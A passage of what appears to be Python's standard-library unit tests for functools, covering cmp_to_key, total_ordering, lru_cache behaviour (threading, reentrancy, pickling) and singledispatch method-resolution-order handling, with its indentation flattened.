key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
